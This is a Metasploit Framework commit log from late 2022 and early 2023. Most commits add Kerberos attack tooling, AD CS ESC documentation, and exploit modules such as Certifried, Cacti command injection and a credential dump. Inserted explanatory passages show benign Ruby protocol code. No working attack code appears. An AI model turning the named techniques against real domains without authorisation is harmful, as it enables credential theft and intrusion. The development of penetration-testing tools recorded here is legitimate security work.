dwelch-r7 2a73ac01e0 Land #17544, Fix ticket cache client metadata 2023-01-25 21:58:36 +00:00
Grant Willcox 71aa4bdace Update ldap_query with find_schema_dn function to find the schema DN which may not be the same as the base DN so we can query security attributes of entries 2023-01-25 15:19:29 -06:00
adfoster-r7 086e2f1b05 Fix ticket cache client metadata 2023-01-25 20:17:51 +00:00
Grant Willcox 3acae04042 Fix up relative path linking with paths that start with a / or ./ so they can now properly link without ambiguity cases. 2023-01-25 13:05:52 -06:00
Spencer McIntyre f81195d0cc Fix a typo 2023-01-25 13:45:18 -05:00
adfoster-r7 b9430da155 Land #17541, Fixes a crash when running smb_login with a blank domain 2023-01-25 18:42:32 +00:00
adfoster-r7 3d003ff14c Land #17540, Handle KDC_ERR_CERTIFICATE_MISMATCH for certifried 2023-01-25 18:39:20 +00:00
adfoster-r7 ea96629925 Bump Metasploit version to 6.3.0 2023-01-25 18:36:48 +00:00
Spencer McIntyre 427e354328 Land #17538, Fix smb login crash
Fix smb login crash with kerberos options set
2023-01-25 13:35:14 -05:00
dwelch-r7 e434b65d9d Land #17535, Add NTLM Hash Extraction via PKINIT to get_ticket 2023-01-25 18:34:18 +00:00
cgranleese-r7 cc0fbbc4e3 Fixes a bug where if realm was blank console would crash 2023-01-25 18:26:47 +00:00
Dean Welch 5b473e4ede Handle KDC_ERR_CERTIFICATE_MISMATCH for certifried 2023-01-25 18:22:54 +00:00
dwelch-r7 dc76f66649 Land #17539, Add additional kerberos error codes 2023-01-25 18:19:12 +00:00
adfoster-r7 eb59d08516 Add additional kerberos error codes 2023-01-25 18:08:07 +00:00
Spencer McIntyre 21f33296b7 Consolidate PKINIT hash extraction code 2023-01-25 12:16:42 -05:00
Spencer McIntyre dba1198a09 Fix a definition in krb5_pac.rb 2023-01-25 11:18:54 -05:00
dwelch-r7 4f574d141a Land #17533, Combine pkinit_login with get_ticket 2023-01-25 15:43:12 +00:00
Spencer McIntyre c7ba117fed Land #17534, Update kerberos cipher negotiation
Update kerberos to negotiate rc4 if aes256 is disabled
2023-01-25 10:19:40 -05:00
Spencer McIntyre 44d8304beb Report the PKCS12 error message 2023-01-25 10:02:37 -05:00
adfoster-r7 d57c56e4a4 Land #17496, update klist to support deleting and deactivating by id 2023-01-25 14:53:05 +00:00
adfoster-r7 24a8582a7b Fix smb login crash with kerberos options set 2023-01-25 13:58:29 +00:00
Spencer McIntyre dbe9ee3a77 Update documentation 2023-01-25 08:39:52 -05:00
Spencer McIntyre a5e2c5b3b7 Unify pkinit_login with get_ticket 2023-01-25 08:36:26 -05:00
Spencer McIntyre 785e2caa9f Refactor #send_request_tgt_pkinit, clarify docs 2023-01-25 08:36:26 -05:00
Dean Welch c143124344 Add feature to set the status of ticket/ccache via klist 2023-01-25 13:28:43 +00:00
adfoster-r7 8d4b1ce3c1 Use the credential etype instead of the encrypted ticket etype 2023-01-25 13:20:50 +00:00
dwelch-r7 effbfe8f58 Land #17536, Update docs to support links with anchors 2023-01-25 12:43:37 +00:00
adfoster-r7 64339f9d4c Land #17537, improve rendered output of docs 2023-01-25 12:37:45 +00:00
adfoster-r7 4c50456b6a Update docs to support links with anchors 2023-01-25 12:16:15 +00:00
cgranleese-r7 930ae1a8c2 Makes adjustments to how docs are formatted to improve rendered output 2023-01-25 12:07:52 +00:00
adfoster-r7 d18beb486d Update kerberos to negotiate rc4 if aes256 is disabled 2023-01-25 00:27:00 +00:00
Spencer McIntyre 2b2e20bd78 Land #17399, Document ESC attack workflow in Wiki 2023-01-24 19:18:50 -05:00
Spencer McIntyre 944645f6d4 Land #17528, Add get user spns example docs
Add get user spns example to kerberoasting docs
2023-01-24 19:15:44 -05:00
Grant Willcox de27166dc9 Move location of the Attacking AD CS writeup and update navigation.rb accordingly 2023-01-24 16:57:14 -06:00
Grant Willcox 86f2af53c9 Remove extra section and try fix up the relative references for the document 2023-01-24 16:39:09 -06:00
Spencer McIntyre 8c1370085d Land #17530, Add conditions to forge_ticket module
Add conditions metadata to forge_ticket module
2023-01-24 09:12:41 -05:00
adfoster-r7 9babcf3564 Add conditions to forge ticket 2023-01-24 13:28:10 +00:00
adfoster-r7 e81bed0378 Land #17526, groups the show options command by their conditions 2023-01-24 13:21:17 +00:00
cgranleese-r7 854fc1400e Improve show options to include options with conditions 2023-01-24 10:43:14 +00:00
adfoster-r7 772ee93612 Add get user spns example to kerberoasting docs 2023-01-24 01:03:13 +00:00
Christophe De La Fuente 38f0d33d6b Add exploit module 2023-01-24 00:55:45 +01:00
Grant Willcox 4c4e6a5802 Fix up navigation issue again 2023-01-23 17:05:36 -06:00
Grant Willcox 05cc578fcd Correct navigation.rb 2023-01-23 14:34:41 -06:00
Grant Willcox 148e591a4e Add in overview about AD CS and what it is used for 2023-01-23 14:33:10 -06:00
Grant Willcox 3b357eed70 Move updated setup guide over to appropriate place and update some of the template with more details 2023-01-23 14:27:28 -06:00
Grant Willcox 5b2a7cc151 Update explanation to clarify ESC3 attacks and how to abuse them 2023-01-23 14:00:00 -06:00
Grant Willcox e73836d4c3 Rename files to appropriate names, fix up typos and add better setup points 2023-01-23 13:59:55 -06:00
Grant Willcox 43aca85d4d Add page on setting up an AD CS target to the navigation.rb file 2023-01-23 13:59:55 -06:00
Grant Willcox 71860a0ea8 Add in separate page for setting up AD CS environment and also make explanation of ESC vulns clearer and higher up in document. 2023-01-23 13:59:54 -06:00
Grant Willcox 5df6d5d511 Fix navigation and some typos 2023-01-23 13:59:54 -06:00
Grant Willcox 1e8a289088 Add in initial commit of attacking ADCS ESC vulnerability documentation 2023-01-23 13:59:54 -06:00
Metasploit 8368accd55 automatic module_metadata_base.json update 2023-01-23 13:50:39 -06:00
space-r7 153af9fb68 Land #17407, add Cacti unauth command injection 2023-01-23 13:06:46 -06:00
Grant Willcox 5106d33ca4 Land #17518, Add the Python command adapter for Windows 2023-01-23 13:01:38 -06:00
bwatters d356b34422 Land #17499, Show extended error information for ICPR
Merge branch 'land-17499' into upstream-kerberos
2023-01-23 12:19:13 -06:00
space-r7 58cd5bb003 specify command stager flavors 2023-01-23 11:53:19 -06:00
Jeffrey Martin 90dc90cbab future proof legacy connection 2023-01-23 10:03:32 -06:00
Jeffrey Martin 58172267ac update to latest Rails 7 gem 2023-01-23 09:59:21 -06:00
Jeffrey Martin 6b64a15ab1 updated metasploit_data_models 2023-01-23 09:59:19 -06:00
Jeffrey Martin 1323889b65 update to released Rails 7 supported deps 2023-01-23 09:58:22 -06:00
Jeffrey Martin 5ce04e97e8 update Gemfile dev deps 2023-01-23 09:57:51 -06:00
Jeffrey Martin 149870d8a5 update Ruby version requirement 2023-01-23 09:57:16 -06:00
Jeffrey Martin f78592bf3f update db/schema.rb for Rails 7 2023-01-23 09:57:16 -06:00
Jeffrey Martin 177f1ec4d8 update that may need guards depending on execution 2023-01-23 09:57:15 -06:00
Jeffrey Martin d9716ebecf core updates for Rails 7 2023-01-23 09:57:09 -06:00
cgranleese-r7 bca40df16b Land #17524, Add additional documentation for mssql and ldap 2023-01-23 15:30:07 +00:00
Spencer McIntyre ed69cb19b2 Land #17520, Remove verbose info in LDAP output
Remove extra info from verbose mode of LDAP output
2023-01-23 09:30:36 -05:00
cgranleese-r7 af740aea85 Land #17515, Use shared helper for creating kerberos options 2023-01-23 13:37:00 +00:00
dwelch-r7 2f6e45af16 Land #17525, Fix deprecation warning in socks proxy 2023-01-23 12:55:04 +00:00
adfoster-r7 20408f4446 Fix deprecation warning in socks proxy 2023-01-23 12:05:57 +00:00
adfoster-r7 e119713c6f Add additional documentation for mssql and ldap 2023-01-23 11:46:51 +00:00
adfoster-r7 9a6c298a43 Use shared helper for creating kerberos options 2023-01-23 11:04:01 +00:00
adfoster-r7 414a54886c Land #17521, Fix up text so we capitalize all words of Metasploit Framework 2023-01-21 00:23:50 +00:00
Grant Willcox dcda0c2ebc Fix up text so we capitalize all words of Metasploit Framework 2023-01-20 17:05:20 -06:00
Grant Willcox 1975c92e92 Remove extra info from verbose mode of LDAP output 2023-01-20 16:51:34 -06:00
Spencer McIntyre 9d07f206fc Bump windows_error to 0.1.5 2023-01-20 16:29:24 -05:00
Spencer McIntyre 190249b993 Bump ruby_smb to 3.2.2 2023-01-20 16:29:24 -05:00
Spencer McIntyre a37cec40fc Show extended error information for ICPR 2023-01-20 16:29:18 -05:00
Grant Willcox cd5842e3f4 Land #17340, Warn On Ignoring Bind Information for Reverse Port Forwarding 2023-01-20 14:40:22 -06:00
Spencer McIntyre 81295e40fa Report the host that's returned from Meterpreter
Report the host that's returned from Meterpreter because that's the most
accurate source of the information.
2023-01-20 14:15:14 -06:00
Spencer McIntyre 729de2478c Warn that the remote host is ignored 2023-01-20 14:15:13 -06:00
Spencer McIntyre 17d8db43a9 Print IPv6 addresses correctly 2023-01-20 14:15:13 -06:00
Spencer McIntyre 7678e7c8ea Pass bind address for reverse port forwards 2023-01-20 14:15:13 -06:00
Spencer McIntyre 2621775053 Add the Python command adapter for Windows 2023-01-20 15:10:39 -05:00
Grant Willcox e537816132 Land #17516, Update metasploit-payloads gem to 2.0.108 2023-01-20 13:55:33 -06:00
Jeffrey Martin 9be26eb0ff improve SMTP delivery error handling 2023-01-20 11:26:25 -06:00
Spencer McIntyre 15237e5154 Update metasploit-payloads gem to 2.0.108
Includes changes from:
  * rapid7/metasploit-payloads#599
  * rapid7/metasploit-payloads#600
  * rapid7/metasploit-payloads#602
2023-01-20 09:21:28 -05:00
Spencer McIntyre 6fe0933c1e Add exploit for CVE-2022-44877 2023-01-20 09:04:24 -05:00
dwelch-r7 ebaf51108c Land #17490, Update impacket get user spns 2023-01-20 13:21:19 +00:00
Christophe De La Fuente 22f45c9a2e Land #17513, Update get ticket module to use aes_key and username convention 2023-01-20 12:44:23 +01:00
dwelch-r7 b2c20dfc51 Land #17514, Fix crash in winrm_script_exec when using Kerberos authentication 2023-01-20 11:21:24 +00:00
adfoster-r7 aaad9436f2 Fix winrm offered etypes 2023-01-20 10:59:25 +00:00
adfoster-r7 4c17b93ca8 Update get ticket module to use aes_key and username convention 2023-01-20 10:47:35 +00:00
Jack Heysel 6ac0d9ba27 Trailing whitespace corrected 2023-01-19 22:16:54 -05:00
Jack Heysel 0e0f62c002 Removed 22621 2023-01-19 14:47:20 -05:00
Jack Heysel 4da94325f3 Rubocop 2023-01-19 13:52:58 -05:00
Metasploit 3602a420d3 Bump version of framework to 6.2.37 2023-01-19 12:05:00 -06:00
Jack Heysel d7215b84b4 Added offsets for W11 22H2 2023-01-19 09:30:28 -05:00
ErikWynter 6419f2d5a5 add 'favorite -l' and 'favorites' as aliases for show favorites 2023-01-19 14:21:45 +02:00
Jack Heysel 63d9445911 Fix for Win Server 2022 and 2019 2023-01-19 00:52:38 -05:00
h00die 3a0b694790 better engrish 2023-01-18 20:12:49 -05:00
bwatters b406699c86 Land #17497, Return if there is no certificate to process
Merge branch 'land-17497' into upstream-kerberos
2023-01-18 16:15:04 -06:00
h00die c823295915 cleanup better 2023-01-18 16:19:48 -05:00
Spencer McIntyre 9bf7617409 Return if there is no certificate to process 2023-01-18 15:05:54 -05:00
Spencer McIntyre ebfcfd4cb9 Land #17066, Add module for Certifried
Add exploit module for Certifried exploit
2023-01-18 14:51:03 -05:00
npm-cesium137-io 8ed4f59c60 veeam_credential_dump refinement
Fixed stupid typo in markdown.

Fixed a bug in the export code that prevented the disposition column
from being exported.
2023-01-18 14:27:28 -05:00
Christophe De La Fuente 64ddc6bb4c Land #17484, Add additional kerberos documentation 2023-01-18 19:40:28 +01:00
Christophe De La Fuente 2072111713 Fix from code review & some improvements
- Improve option validation
- Always request an impersonated TGS for `cifs/...` SPN
- SPN option now is used to request an additional TGS for another SPN
- Add exception handling for Kerberos errors
- Only remove the computer account if it has been created
2023-01-18 19:28:06 +01:00
bwatters ed0ede0cad Land #17472, Always autocomplete options regardless of condition filtering
Merge branch 'land-17472' into upstream-kerberos
2023-01-18 10:59:16 -06:00
adfoster-r7 c55fcb6ca6 Add additional kerberos documentation 2023-01-18 16:58:34 +00:00
dwelch-r7 067126af44 Land #17493, Add additional datastore validation to forge ticket 2023-01-18 12:33:12 +00:00
adfoster-r7 a28666d3c5 Add additional datastore validation to forge ticket 2023-01-18 10:46:32 +00:00
Jack Heysel 2c2bfec4a0 Tested on Windows Build 19044, 19045 and 22000 2023-01-18 01:41:30 -05:00
Spencer McIntyre 365b71d60f Land #17471, Update get_ticket cache logic
Update kerberos get_ticket cache logic
2023-01-17 18:49:08 -05:00
h00die d0abb5697b re-add license stuff 2023-01-17 17:31:01 -05:00
bwatters 0dbb0dc8c9 Fix margins for readability and delete file 2023-01-17 17:28:27 -05:00
bwatters d1f878c4f0 Fix spelling 2023-01-17 17:28:27 -05:00
bwatters 158c557d58 Update LICENSE file and location of source file 2023-01-17 17:28:22 -05:00
h00die e28ff3b160 minor fixes 2023-01-17 15:30:36 -05:00
h00die be7ca91a8f cve-2022-22942 2023-01-17 15:30:36 -05:00
adfoster-r7 7f62fa33f3 Update impacket get user spns 2023-01-17 19:53:42 +00:00
adfoster-r7 5ed2fe9ad2 Update kerberos get_ticket cache logic 2023-01-17 00:32:18 +00:00
Hamilton Tobon Mosquera d01060f40f docs: how to set complex options using quotes 2023-01-16 17:38:20 -05:00
cgranleese-r7 202eb85066 Land #17470, Update kerberos login to support diacritics 2023-01-16 12:22:44 +00:00
adfoster-r7 5ef1f9f4f4 Update kerberos login to support diacritics 2023-01-16 12:08:54 +00:00
cgranleese-r7 7a2f6fef86 Land #17477, Merge 6.2.36 master into kerberos feature branch 2023-01-16 11:53:21 +00:00
adfoster-r7 b4797ba74f Land #17422, Add kerberoasting documentation 2023-01-16 10:30:20 +00:00
adfoster-r7 f637885f0a Land #17468, Fix error when printing ticket contents from a kirbi file format 2023-01-16 10:07:36 +00:00
Dean Welch 1470396f95 Refactor key validation for inspect_ticket and add module tests 2023-01-13 17:42:32 +00:00
adfoster-r7 eddac9321c Merge 6.2.36 master into kerberos feature branch 2023-01-13 17:31:02 +00:00
cgranleese-r7 25550a4ef0 Land #17475, Enable new datastore implementation by default 2023-01-13 16:40:58 +00:00
Christophe De La Fuente 3d22fbcad9 Add exploit module for Certifried exploit
- Move all the logic from `modules/auxiliary/admin/dcerpc/icpr_cert.rb`
  to `lib/msf/core/exploit/remote/ms_icpr.rb` library
- Move all the logic from `modules/auxiliary/admin/dcerpc/samr_computer.rb`
  to `lib/msf/core/exploit/remote/ms_samr.rb` library
- Add `modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb` module
- Update the SMB client to disable SSL by default
- Add documentation
- Kerberos client: pass `options` as argument to `send_request_as`
- `calculate_shared_key` returns an EncryptionKey instead of the raw key
- Update `pkinit_login` module to make it compatible
- Add support for `additional_tickets` when requesting tickets
- Add support for PAC CredentialInfo structures
- Add impersonation to escalate privileges
- Add ACTIONS
- Use elevated TGS to delete the computer account
- Update and add specs
2023-01-13 15:30:50 +01:00
adfoster-r7 19d2e985ef Enable new datastore implementation by default 2023-01-13 13:51:56 +00:00
adfoster-r7 a36882aee3 Always autocomplete options regardless of condition filtering 2023-01-13 13:11:32 +00:00
ErikWynter 8472efed02 fix typos, add reference, don't use methods to wrap datastore options 2023-01-13 14:53:29 +02:00
Dean Welch 75153aded3 Fix missing method error when printing ticket contents from a kirbi file format 2023-01-13 10:19:07 +00:00
cgranleese-r7 9c2b8138a7 Land #17456, Make the Kerberos Encryption Type Configurable 2023-01-12 13:25:48 +00:00
Jack Heysel 145589f7a2 Add GetPteBaseW10 2023-01-12 01:15:23 -05:00
adfoster-r7 a484350fdf Land #17455, Fix Chunked Kerberos Responses 2023-01-11 22:09:06 +00:00
Spencer McIntyre 2f145769da Actually, offered_etypes needs to be an array 2023-01-11 17:08:27 -05:00
Hamilton Tobon Mosquera fd7fbb76af fix: cmd_run: remove unnecessary map
Removing the call to .map over args[:datastore_options] avoids an unnecessary call to Msf::DataStore#import_options_from_s. args[:datastore_options] is already a hash, converting it to string and using Msf::DataStore#import_options_from_s converts it back to hash, which is not necessary. The Msf::Simple::Module mixin already offers support for Options, which is expected to be a hash.

This change also prevents sending corner case option strings to Msf::DataStore#import_options_from_s when using post modules, which does not support strings like: "COMMAND='date --date=2023-01-01'".
2023-01-11 16:54:13 -05:00
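The commit message above turns on the corner case `COMMAND='date --date=2023-01-01'`: an option value that itself contains `=`. The following is an added example, not Metasploit's own `Msf::DataStore#import_options_from_s`, showing the parsing rule that handles it: tokenise the option string with shell quoting rules, then split each token on its first `=` only. The function name and the upper-casing of option names are this example's choices; the sample option strings are constructed.

```ruby
require 'shellwords'

# Parse a module option string such as
#   "SESSION=1 COMMAND='date --date=2023-01-01'"
# into a Hash. Tokens are produced with shell quoting rules (single and
# double quotes, backslash escapes), and each token is split on its *first*
# '=' only, so a quoted value may contain further '=' characters.
def parse_option_string(str)
  Shellwords.split(str).each_with_object({}) do |word, opts|
    name, sep, value = word.partition('=')
    if sep.empty? || name.empty?
      raise ArgumentError, "expected NAME=VALUE, got #{word.inspect}"
    end
    # Option names are treated case-insensitively in this example.
    opts[name.upcase] = value
  end
end

if __FILE__ == $PROGRAM_NAME
  p parse_option_string("SESSION=1 COMMAND='date --date=2023-01-01'")
end
```

`Shellwords.split` raises `ArgumentError` on an unmatched quote, so a malformed string fails loudly instead of silently truncating the command.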
Hamilton Tobon Mosquera 03acb7e9f2 test: added rspec tests for 6074d1a4d3 2023-01-11 15:46:55 -05:00
Spencer McIntyre a4a5162b92 Remove the etype option in favor of offered_etypes 2023-01-11 10:17:52 -05:00
adfoster-r7 6f7d7bcd1c Land #17394, Add ticket converter docs 2023-01-11 02:11:59 +00:00
Jack Heysel a61ecd6e40 Moved to wiki, added hashcat tutorial 2023-01-10 10:57:28 -05:00
Spencer McIntyre 138f3bb4b2 Make the encryption type configurable 2023-01-09 17:20:57 -05:00
Spencer McIntyre b7f6fe584a Add initial lib changes for configurable etypes 2023-01-09 16:43:42 -05:00
npm-cesium137-io 499d1ccfd7 Refactor veeam_credential_dump
Changed the SQL queries for DB dump to explicit VARCHAR(4096) to get
around sqlcmd's 256-char column limit.

Refactored the BATCH_DPAPI functionality because I can't seem to let
this pattern go: now actually batches with byte threshold set by
advanced option.

Reduced clutter and redundancy.

Various tweaks and bug fixes.

Updated documentation.
2023-01-09 16:31:44 -05:00
Spencer McIntyre 2494c367e7 Handle chunked Kerberos responses
Chunked responses from partial reads are possible when pivoting.
2023-01-09 11:24:53 -05:00
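The commit above notes that a Kerberos response may arrive in pieces when the KDC is reached through a pivot. The following is an added example, not Metasploit's Kerberos client code, showing the framing that makes reassembly possible: Kerberos over TCP (RFC 4120 section 7.2.2) prefixes every message with a 4-byte big-endian length whose high bit is reserved, so a reader can loop until it has the full length rather than assume a single read returns the whole message. The `ChunkedIO` class is a constructed stand-in for a channel that returns short reads; the function names and the 1 MiB size cap are this example's own.

```ruby
# Kerberos over TCP (RFC 4120 section 7.2.2): 4-byte big-endian length prefix,
# high bit reserved and must be zero.
KRB5_TCP_LENGTH_MASK = 0x7fff_ffff

def frame_krb5_tcp(msg)
  raise ArgumentError, 'message too large for the 31-bit length field' if msg.bytesize > KRB5_TCP_LENGTH_MASK
  [msg.bytesize].pack('N') + msg.b
end

# Read exactly n bytes, looping over partial reads. io#read(n) is expected
# to return at most n bytes, or nil / "" once the peer has closed.
def read_exactly(io, n)
  buf = ''.b
  while buf.bytesize < n
    chunk = io.read(n - buf.bytesize)
    raise EOFError, "peer closed after #{buf.bytesize} of #{n} bytes" if chunk.nil? || chunk.empty?
    buf << chunk
  end
  buf
end

# Read one length-prefixed Kerberos message. The cap on max_len keeps a
# hostile or corrupted length field from driving an unbounded allocation.
def read_krb5_tcp_message(io, max_len: 1 << 20)
  len = read_exactly(io, 4).unpack1('N')
  raise IOError, 'reserved high bit set in length prefix' if len & 0x8000_0000 != 0
  raise IOError, "length #{len} exceeds limit #{max_len}" if len > max_len
  read_exactly(io, len)
end

# Constructed test double for a pivoted channel: returns at most `chunk`
# bytes per read, which is how the partial reads described above show up.
class ChunkedIO
  def initialize(data, chunk)
    @data = data.b.dup
    @chunk = chunk
  end

  def read(n)
    return nil if @data.empty?
    @data.slice!(0, [n, @chunk].min)
  end
end

if __FILE__ == $PROGRAM_NAME
  sample = (0...100).map { |i| i * 3 % 256 }.pack('C*') # constructed payload
  io = ChunkedIO.new(frame_krb5_tcp(sample), 7)
  puts "reassembled #{read_krb5_tcp_message(io).bytesize} bytes from 7-byte reads"
end
```

The same loop applies to any length-prefixed protocol carried over a Meterpreter or SOCKS pivot; the failure mode the commit fixes is a reader that treats the first short read as the complete message and then fails to decode it.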
Grant Willcox d076b9c7ab Merge pull request #17166 from k0pak4/improve-golden-ticket-module
Improve golden ticket module with hash check and better loot storage
2023-01-06 16:39:29 -06:00
Matthew Dunn 8f302c8697 Complete requested PR changes
Clone the cc_principle
2023-01-06 14:48:53 -06:00
Grant Willcox 3d9ea4492f Fix up extra blank lines and make ticket type being saved clearer 2023-01-06 14:48:53 -06:00
Matthew Dunn d64c4b6e7e Store the binary format of the ccache
update key to be correct
2023-01-06 14:48:53 -06:00
Matthew Dunn ccfc253eb8 Updates to get ccache in golden ticket
Fix incorrect reference
Use proper encoding
2023-01-06 14:48:52 -06:00
Matthew Dunn ff029842ce Verify NT hash and store golden ticket as kirbi and ccache 2023-01-06 14:48:38 -06:00
Grant Willcox 9dce44f195 Merge pull request #17390 from dwelch-r7/move-debug-ticket-to-new_module
Move debug ticket to new module
2023-01-06 11:35:18 -06:00
Grant Willcox d69564f3df Minor update to merge output and example together. 2023-01-06 10:15:16 -06:00
Grant Willcox 0be28f64b4 Merge pull request #17443 from dwelch-r7/Fix-ldap-failure-constants
Use the correct constant names for ldap failures
2023-01-06 09:19:28 -06:00
Hamilton Tobon Mosquera 6074d1a4d3 fix: parse COMMAND with nested '=' in meterpreter
Fixes bug #16578
2023-01-06 09:27:25 -05:00
Dean Welch 8078616f5f Use the correct constant names for ldap failures 2023-01-06 14:11:26 +00:00
dwelch-r7 75372dcdd3 Land #17374, Add klist command 2023-01-06 12:57:20 +00:00
Grant Willcox 0af0f6ea0a Merge pull request #17440 from zeroSteiner/fix/smb-aes-256-kerberos
Fix SMB key calculation for AES-256 when authenticating with Kerberos
2023-01-05 17:05:28 -06:00
Spencer McIntyre 785c5a8f4d Fix key calculation for Server 2022
Metasploit will negotiate the strongest mutually supported encryption
with the target. When the target supports AES-256 as Server 2022 and
Windows 11 do, the key needs to be 32-bytes long and not 16 as it is
when AES-128 is in use. This updates the logic to check if the
encryption algorithm is set to ensure that the key is the correct size.
2023-01-05 15:08:49 -05:00
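The commit above explains why the Kerberos-derived SMB session key must be used at its full 32-byte length when the negotiated cipher is AES-256. The following is an added example, not ruby_smb or Metasploit code, showing the SMB 3.1.1 key derivation as this example reads [MS-SMB2] 3.1.4.2: an SP800-108 counter-mode KDF with HMAC-SHA256, the label `SMBC2SCipherKey`, the pre-authentication integrity hash as context, and the cipher ID selecting either the 16-byte `Session.SessionKey` with L=128 or the 32-byte `Session.FullSessionKey` with L=256. The constant and function names, the error raised for a too-short key, and the sample key and hash are this example's own.

```ruby
require 'openssl'

# Cipher IDs carried in the SMB2_ENCRYPTION_CAPABILITIES negotiate context.
SMB2_ENCRYPTION_AES128_CCM = 0x0001
SMB2_ENCRYPTION_AES128_GCM = 0x0002
SMB2_ENCRYPTION_AES256_CCM = 0x0003
SMB2_ENCRYPTION_AES256_GCM = 0x0004
AES256_CIPHERS = [SMB2_ENCRYPTION_AES256_CCM, SMB2_ENCRYPTION_AES256_GCM].freeze

# SP800-108 KDF in counter mode with HMAC-SHA256 as the PRF, as SMB 3.x uses it:
#   K(i) = HMAC-SHA256(ki, [i]_32 || label || 0x00 || context || [bits]_32)
# Blocks are concatenated and the result truncated to bits/8 bytes.
def smb3_kdf(ki, label, context, bits)
  out = ''.b
  counter = 1
  while out.bytesize < bits / 8
    fixed = [counter].pack('N') + label + "\x00".b + context + [bits].pack('N')
    out << OpenSSL::HMAC.digest('SHA256', ki, fixed)
    counter += 1
  end
  out[0, bits / 8]
end

# Derive the client-to-server cipher key for an SMB 3.1.1 session.
# gss_session_key: the key handed back by the GSS layer; for Kerberos this is
#   the authenticator subkey, 32 bytes under AES256-CTS-HMAC-SHA1-96 and 16
#   bytes under AES128 or RC4.
# preauth_hash: Session.PreauthIntegrityHashValue (SHA-512, 64 bytes).
def smb311_c2s_cipher_key(gss_session_key, preauth_hash, cipher_id)
  if AES256_CIPHERS.include?(cipher_id)
    # Session.FullSessionKey: the whole 32-byte key, L = 256. A 16-byte key
    # cannot satisfy this; raising here is this example's choice.
    if gss_session_key.bytesize < 32
      raise ArgumentError, "cipher #{cipher_id} needs a 32-byte session key, got #{gss_session_key.bytesize}"
    end
    smb3_kdf(gss_session_key[0, 32], "SMBC2SCipherKey\x00".b, preauth_hash, 256)
  else
    # Session.SessionKey: only the first 16 bytes of the GSS key, L = 128.
    smb3_kdf(gss_session_key[0, 16], "SMBC2SCipherKey\x00".b, preauth_hash, 128)
  end
end

if __FILE__ == $PROGRAM_NAME
  key  = (0...32).map { |b| b * 7 }.pack('C*')                     # constructed subkey
  hash = OpenSSL::Digest::SHA512.digest('constructed preauth data') # constructed context
  puts smb311_c2s_cipher_key(key, hash, SMB2_ENCRYPTION_AES128_GCM).unpack1('H*')
  puts smb311_c2s_cipher_key(key, hash, SMB2_ENCRYPTION_AES256_GCM).unpack1('H*')
end
```

The practical check when debugging a Server 2022 or Windows 11 target that rejects encrypted traffic after a Kerberos session setup: compare the cipher ID the server picked with the length of the key your client fed into the KDF; a 16-byte key truncated from a 32-byte subkey produces a valid-looking but wrong AES-256 key.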
Christophe De La Fuente 1ede6661d4 Land #17382, Update pkinit tgt response to include key 2023-01-05 20:45:20 +01:00
Dean Welch 2de3477eb0 Add msfconsole examples 2023-01-05 17:02:23 +00:00
Dean Welch a18efb7882 Improve description and error messages 2023-01-05 14:24:08 +00:00
Grant Willcox e99c406355 Merge pull request #17434 from dwelch-r7/fix-typo-keytab-docs
Fix keytab docs typo
2023-01-04 11:13:44 -06:00
Dean Welch cb95d92201 Fix keytab docs typo 2023-01-04 15:39:59 +00:00
Christophe De La Fuente 868072e6c8 Land #17317, Fix various WinRM modules 2023-01-03 19:57:07 +01:00
Christophe De La Fuente 9f869f5a11 Add a call to super in run 2023-01-03 19:54:06 +01:00
Ashley Donaldson 45c0af48c2 Suggested changes from code review 2023-01-03 11:26:07 +11:00
adfoster-r7 a8957bce49 Update tgt response to include key 2022-12-30 13:41:54 +00:00
Grant Willcox e9f86ce6e8 Merge pull request #17421 from adfoster-r7/merge-6.2.33-master-into-kerberos-feature-branch
Merge 6.2.33 master into kerberos feature branch
2022-12-29 22:48:14 -06:00
Jack Heysel 5a8d330f80 Msftidy fixes 2022-12-28 17:11:55 -05:00
Jack Heysel 8f277abbf2 Add kerberoasting documentation 2022-12-28 16:55:57 -05:00
timwr ce260f53f3 Add CVE-2022-46689 macOS dirty cow 2022-12-28 22:46:08 +07:00
adfoster-r7 95d361754f Merge branch 'upstream-master' into merge-6.2.33-master-into-kerberos-feature-branch 2022-12-28 13:59:42 +00:00
Grant Willcox a49e8c7afb Merge pull request #17405 from adfoster-r7/update-smb-enumshares-to-gracefully-fallover-from-139-to-445
Update smb enumshares to gracefully failover from port 139 to 445
2022-12-27 15:42:01 -06:00
ErikWynter 8f96746551 fix typo and add credit for discovery 2022-12-23 11:11:31 +02:00
ErikWynter 4c2dfe0279 add cacti_unauthenticated_cmd_injection 2022-12-22 17:55:45 +02:00
npm-cesium137-io 9cc8d41388 veeam_credential_dump post module revisions
Cleanup for initial PR.
2022-12-21 15:53:46 -05:00
adfoster-r7 9d725b1e67 Update smb enumshares to gracefully failover from 139 to 445 2022-12-21 20:23:01 +00:00
bwatters 6b0805dc11 Update cmdstager docs 2022-12-16 15:55:30 -06:00
Grant Willcox b01720dcba Merge pull request #17397 from zeroSteiner/fix/pkinit-nameerror
Fix a NameError in pkinit_login
2022-12-16 15:28:45 -06:00
Spencer McIntyre b2edf1108a Fix a NameError in pkinit_login 2022-12-16 14:54:46 -05:00
Dean Welch 4e1e85f8ad Add ticket converter docs 2022-12-16 13:53:05 +00:00
adfoster-r7 6f9ebe4068 Add klist command 2022-12-16 13:02:39 +00:00
adfoster-r7 20496aadc2 Land #17377, Consolidate Kerberos Ticket Storage 2022-12-16 01:35:36 +00:00
Spencer McIntyre 60a76da374 Allow deleting tickets by ID 2022-12-15 18:31:18 -05:00
Spencer McIntyre 75fc560d19 Handle cases where the framework module is nil 2022-12-15 18:31:18 -05:00
Spencer McIntyre 830e850160 Add more docs 2022-12-15 18:31:18 -05:00
Spencer McIntyre 663dee982e Expose an abstract stored ticket object 2022-12-15 18:31:18 -05:00
Spencer McIntyre fea259f6e7 Switch everything to use the ticket storage 2022-12-15 18:31:14 -05:00
Spencer McIntyre b2a4bea761 Breakout the ticket storage backend drivers 2022-12-15 18:29:00 -05:00
Spencer McIntyre 686b946c5b Use a new TicketStorage class
The goal is to provide an abstraction for how Kerberos tickets are
persisted to disk.
2022-12-15 18:28:54 -05:00
Spencer McIntyre 5f52ebeea7 Consolidate the loot_info UID string 2022-12-15 18:26:32 -05:00
Ron Bowes 2ec77e6d95 Merge branch 'master' into f5-createuser-privesc 2022-12-15 13:11:26 -08:00
Jack Heysel 3204caf618 Make use of session platform 2022-12-15 14:28:19 -05:00
Jack Heysel 87614cf2b3 Fixed spacing updated check method 2022-12-15 14:15:06 -05:00
Christophe De La Fuente 6e09236c97 Land #17381, Update rasn1 dependency for pkinit 2022-12-15 17:38:49 +01:00
